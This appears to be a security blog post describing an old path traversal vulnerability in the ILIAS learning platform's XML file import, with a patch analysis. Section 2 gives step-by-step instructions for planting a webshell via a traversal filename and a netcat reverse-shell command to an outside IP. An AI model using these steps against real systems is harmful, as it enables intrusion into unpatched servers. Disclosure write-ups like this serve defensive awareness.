ILIAS is a free and open source learning platform which can be used to create and distribute web-based teaching and learning materials. It is often used by universities and companies for e-learning. This blog post describes how we discovered an old ILIAS vulnerability which has no CVE entry, therefore might be overlooked. Vulnerable: all 4.x, <5.0.21, <5.1.17, <5.2.3 versions. Releases 5.3 and newer are not vulnerable! Patched April 2017. Access to file import from XML needed, e.g. by having course administration rights.
Contents
- Discovery of the vulnerability
- Exploiting the vulnerability
- Analyzing the patch of the vulnerability
- Conclusion
1. Discovery of the vulnerability
We were tasked to perform a security test on an e-learning platform to identify vulnerabilities and misconfigurations before it was launched and used in production. The utilized e-learning platform is based on ILIAS. During the information gathering phase, we noticed that the platform was running on an outdated version. Therefore, we started researching for known vulnerabilities, but we had no success with that. While browsing through the mailing lists we came across a particular interesting one from April 2017 (v 5.2.3). It mentioned several security vulnerabilities that were patched.
In this post the vulnerability was narrowed down to the XML import function and a time period (April 2017) and could give us the possibility of copying a file to an arbitrary location on the file system.
Since ILIAS is open source and its source code is hosted on GitHub. We were able to search for the commit that fixes this vulnerability. Knowing the approximate date, the vulnerability was fixed, and the affected file, we quickly found two commits which patched the vulnerability:
Based on this information we started to develop our own proof of concept.
2. Exploiting the vulnerability
You need an account with some access rights in ILIAS to use the file import function, e.g. course administration. We had these permissions due to another vulnerability unrelated to ILIAS. If you can upload files, you can follow these 6 steps to open a webshell:
- Export Files as XML
- Unzip archive
- Open the export.xml file and change the XML
Filenametag to../../../../../../../../../../../../../var/www/ilias/shell.php- where the path is a web reachable folder - Recreate the archive including the changed XML file
- Import the modified zip into ILIAS: 'Add new object' –> 'File' –> 'Option 2: File Import'
- Open
https://example.com/ilias/shell.php?cmd=nc -e /bin/sh 1.2.3.4 80
3. Analyzing the patch of the vulnerability
How did the ILIAS developer patch this vulnerability that could be abused for arbitrary file upload and even remote code execution?
In April 2017 (v 5.2.3) they added a function called: normalizeRelativePath
If a relative path is used, it is possible to access the parent directory by using two dots '..'. This made it possible to breakout out of the current directory into parent directories. With this we can choose where our shell should be placed after the import. The new function normalizeRelativePath removes these characters.
Before the patch the path string was handled unfiltered:
$this->getImportDirectory()+"/"+"../../../../../../../../../../../../../var/www/example.com/ILIAS/shell.php"
Now this string is filtered with the function normalizeRelativePath and looks like this after the filtering: getImportDirectory()+"/"+"var/www/example.com/example.com/ILIAS/shell.php"
4. Conclusion
Open Source Software is great! It makes good products available to everyone and makes it possible to find bugs early, because everyone can have a look. On the other hand, having a version control system that is accessible for everyone, old flaws and mistakes can easily be found and exploited. That is why it is really important to keep your software up to date.
The described vulnerability made it possible to import a shell into ILIAS and control the directory where it is placed by manipulating the XML file. After that we could execute the shell from remote which resulted in a RCE. This was discovered by searching the mailing list, were they mentioned a bug in the XML import function. Additionally, we showed how to exploit this vulnerability step by step.
Read about other interesting topics on our blog.